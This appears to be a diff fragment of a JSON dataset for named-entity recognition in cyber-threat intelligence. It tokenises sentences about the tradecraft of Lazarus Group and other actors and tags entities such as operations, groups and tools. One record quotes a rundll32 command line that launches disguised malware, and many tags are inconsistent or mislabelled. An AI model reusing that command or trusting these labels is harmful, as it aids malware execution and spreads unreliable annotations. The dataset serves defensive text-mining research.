], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "B-Org", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "generated", - "a", - "web", - "shell", - "within", - "a", - "vulnerable", - "Enterprise", - "Resource", - "Planning", - "Web", - "Application", - "Server", - "as", - "a", - "persistence", - "mechanism." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "batch", - "scripts", - "to", - "perform", - "reconnaissance." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "modified", - "the", - "`IKEEXT`", - "and", - "`PrintNotify`", - "Windows", - "services", - "for", - "persistence." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "archived", - "victim's", - "data", - "into", - "a", - "RAR", - "file." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "performed", - "brute", - "force", - "attacks", - "against", - "administrator", - "accounts." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "digitally", - "signed", - "their", - "own", - "malware", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "digitally", - "signed", - "their", - "malware", - "and", - "the", - "dbxcli", - "utility." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "used", - "code", - "signing", - "certificates", - "issued", - "by", - "Sectigo", - "RSA", - "for", - "some", - "of", - "its", - "malware", - "and", - "tools." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "used", - "malicious", - "Trojans", - "and", - "DLL", - "files", - "to", - "exfiltrate", - "data", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "B-SamFile", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "used", - "tools", - "that", - "used", - "the", - "`IsDebuggerPresent`", - "call", - "to", - "detect", - "debuggers." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "queried", - "compromised", - "victim's", - "active", - "directory", - "servers", - "to", - "obtain", - "the", - "list", - "of", - "employees", - "including", - "administrator", - "accounts." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "registered", - "a", - "domain", - "name", - "identical", - "to", - "that", - "of", - "a", - "compromised", - "company", - "as", - "part", - "of", - "their", - "BEC", - "effort." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "compromised", - "domains", - "in", - "Italy", - "and", - "other", - "countries", - "for", - "their", - "C2", - "infrastructure." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "created", - "fake", - "email", - "accounts", - "to", - "correspond", - "with", - "fake", - "LinkedIn", - "personas;", - "Lazarus", - "Group", - "also", - "established", - "email", - "accounts", - "to", - "match", - "those", - "of", - "the", - "victim", - "as", - "part", - "of", - "their", - "BEC", - "attempt." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "encrypted", - "malware", - "such", - "as", - "DRATzarus", - "with", - "XOR", - "and", - "DLL", - "files", - "with", - "base64." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "exfiltrated", - "data", - "from", - "a", - "compromised", - "host", - "to", - "actor-controlled", - "C2", - "servers." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "used", - "a", - "custom", - "build", - "of", - "open-source", - "command-line", - "dbxcli", - "to", - "exfiltrate", - "stolen", - "data", - "to", - "Dropbox." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "removed", - "all", - "previously", - "delivered", - "files", - "from", - "a", - "compromised", - "computer." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "conducted", - "word", - "searches", - "within", - "documents", - "on", - "a", - "compromised", - "host", - "in", - "search", - "of", - "security", - "and", - "financial", - "matters." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "conducted", - "extensive", - "reconnaissance", - "research", - "on", - "potential", - "targets." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "gathered", - "victim", - "organization", - "information", - "to", - "identify", - "specific", - "targets." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "targeted", - "Windows", - "servers", - "running", - "Internet", - "Information", - "Systems", - "(IIS)", - "to", - "install", - "C2", - "components." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "targeted", - "specific", - "individuals", - "within", - "an", - "organization", - "with", - "tailored", - "job", - "vacancy", - "announcements." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "impersonated", - "HR", - "hiring", - "personnel", - "through", - "LinkedIn", - "messages", - "and", - "conducted", - "interviews", - "with", - "victims", - "in", - "order", - "to", - "deceive", - "them", - "into", - "downloading", - "malware." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "downloaded", - "multistage", - "malware", - "and", - "tools", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "conducted", - "internal", - "spearphishing", - "from", - "within", - "a", - "compromised", - "organization." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "lured", - "victims", - "into", - "executing", - "malicious", - "documents", - "that", - "contained", - "\"dream", - "job\"", - "descriptions", - "from", - "defense,", - "aerospace,", - "and", - "other", - "sectors." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "lured", - "users", - "into", - "executing", - "a", - "malicious", - "link", - "to", - "disclose", - "private", - "account", - "information", - "or", - "provide", - "initial", - "access." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "developed", - "custom", - "tools", - "such", - "as", - "Sumarta,", - "DBLL", - "Dropper,", - "Torisma,", - "and", - "DRATzarus", - "for", - "their", - "operations." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Tool", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "disguised", - "malicious", - "template", - "files", - "as", - "JPEG", - "files", - "to", - "avoid", - "detection." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "used", - "Windows", - "API", - "`ObtainUserAgentString`", - "to", - "obtain", - "the", - "victim's", - "User-Agent", - "and", - "used", - "the", - "value", - "to", - "connect", - "to", - "their", - "C2", - "server." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "used", - "PowerShell", - "commands", - "to", - "explore", - "the", - "environment", - "of", - "compromised", - "victims." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "placed", - "LNK", - "files", - "into", - "the", - "victims'", - "startup", - "folder", - "for", - "persistence." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "used", - "`regsvr32`", - "to", - "execute", - "malware." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "executed", - "malware", - "with", - "`C:\\\\windows\\system32\\rundll32.exe", - "\"C:\\ProgramData\\ThumbNail\\thumbnail.db\"`,", - "`CtrlPanel", - "S-6-81-3811-75432205-060098-6872", - "0", - "0", - "905`." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "created", - "scheduled", - "tasks", - "to", - "set", - "a", - "periodic", - "execution", - "of", - "a", - "remote", - "XSL", - "script." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "acquired", - "servers", - "to", - "host", - "their", - "malicious", - "tools." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "compromised", - "servers", - "to", - "host", - "their", - "malicious", - "tools." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "used", - "LinkedIn", - "to", - "identify", - "and", - "target", - "employees", - "within", - "a", - "chosen", - "organization." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "created", - "fake", - "LinkedIn", - "accounts", - "for", - "their", - "targeting", - "efforts." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "packed", - "malicious", - ".db", - "files", - "with", - "Themida", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "sent", - "emails", - "with", - "malicious", - "attachments", - "to", - "gain", - "unauthorized", - "access", - "to", - "targets'", - "computers." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "sent", - "malicious", - "OneDrive", - "links", - "with", - "fictitious", - "job", - "offer", - "advertisements", - "via", - "email." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "sent", - "victims", - "spearphishing", - "messages", - "via", - "LinkedIn", - "concerning", - "fictitious", - "jobs." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "used", - "an", - "AES", - "key", - "to", - "communicate", - "with", - "their", - "C2", - "server." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "used", - "tools", - "that", - "conducted", - "a", - "variety", - "of", - "system", - "checks", - "to", - "detect", - "sandboxes", - "or", - "VMware", - "services." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "deployed", - "malware", - "designed", - "not", - "to", - "run", - "on", - "computers", - "set", - "to", - "Korean,", - "Japanese,", - "or", - "Chinese", - "in", - "Windows", - "language", - "preferences." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "B-Area", - "O", - "B-Area", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "used", - "DOCX", - "files", - "to", - "retrieve", - "a", - "malicious", - "document", - "template/DOTM", - "file." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "used", - "tools", - "that", - "collected", - "`GetTickCount`", - "and", - "`GetSystemTimeAsFileTime`", - "data", - "to", - "detect", - "sandbox", - "or", - "VMware", - "services." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "obtained", - "tools", - "such", - "as", - "Wake-On-Lan,", - "Responder,", - "ChromePass,", - "and", - "dbxcli." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "used", - "compromised", - "servers", - "to", - "host", - "malware." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "used", - "multiple", - "servers", - "to", - "host", - "malicious", - "tools." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "executed", - "a", - "VBA", - "written", - "malicious", - "macro", - "after", - "victims", - "download", - "malicious", - "DOTM", - "files;", - "Lazarus", - "Group", - "also", - "used", - "Visual", - "Basic", - "macro", - "code", - "to", - "extract", - "a", - "double", - "Base64", - "encoded", - "DLL", - "implant." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Tool", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "uses", - "HTTP", - "and", - "HTTPS", - "to", - "contact", - "actor-controlled", - "C2", - "servers." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "used", - "file", - "hosting", - "services", - "like", - "DropBox", - "and", - "OneDrive." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "launched", - "malicious", - "DLL", - "files,", - "created", - "new", - "folders,", - "and", - "renamed", - "folders", - "with", - "the", - "use", - "of", - "the", - "Windows", - "command", - "shell." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "used", - "WMIC", - "to", - "executed", - "a", - "remote", - "XSL", - "script." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dream", - "Job,", - "Lazarus", - "Group", - "used", - "a", - "remote", - "XSL", - "script", - "to", - "download", - "a", - "Base64-encoded", - "DLL", - "custom", - "downloader." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Tool", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dust", - "Storm,", - "attackers", - "used", - "VBS", - "code", - "to", - "decode", - "payloads." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "B-HackOrg", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Dust", - "Storm,", - "the", - "threat", - "actors", - "established", - "domains", - "as", - "part", - "of", - "their", - "operational", - "infrastructure." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dust", - "Storm,", - "the", - "threat", - "actors", - "used", - "a", - "watering", - "hole", - "attack", - "on", - "a", - "popular", - "software", - "reseller", - "to", - "exploit", - "the", - "then-zero-day", - "Internet", - "Explorer", - "vulnerability", - "CVE-2014-0322." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Exp", - "I-Exp", - "I-Exp", - "B-Features" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Dust", - "Storm,", - "the", - "threat", - "actors", - "used", - "dynamic", - "DNS", - "domains", - "from", - "a", - "variety", - "of", - "free", - "providers,", - "including", - "No-IP,", - "Oray,", - "and", - "3322." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-Idus", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "For", - "Operation", - "Dust", - "Storm,", - "the", - "threat", - "actors", - "established", - "email", - "addresses", - "to", - "register", - "domains", - "for", - "their", - "operations." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dust", - "Storm,", - "the", - "threat", - "actors", - "encoded", - "some", - "payloads", - "with", - "a", - "single-byte", - "XOR,", - "both", - "skipping", - "the", - "key", - "itself", - "and", - "zeroing", - "in", - "an", - "attempt", - "to", - "avoid", - "exposing", - "the", - "key;", - "other", - "payloads", - "were", - "Base64-encoded." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dust", - "Storm,", - "the", - "threat", - "actors", - "exploited", - "Adobe", - "Flash", - "vulnerability", - "CVE-2011-0611,", - "Microsoft", - "Windows", - "Help", - "vulnerability", - "CVE-2010-1885,", - "and", - "several", - "Internet", - "Explorer", - "vulnerabilities,", - "including", - "CVE-2011-1255,", - "CVE-2012-1889,", - "and", - "CVE-2014-0322." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "I-Exp", - "I-Exp", - "I-Exp", - "B-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Features", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dust", - "Storm,", - "the", - "threat", - "actors", - "used", - "JavaScript", - "code." - ], - "ner_tags": [ - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "During", - "Operation", - "Dust", - 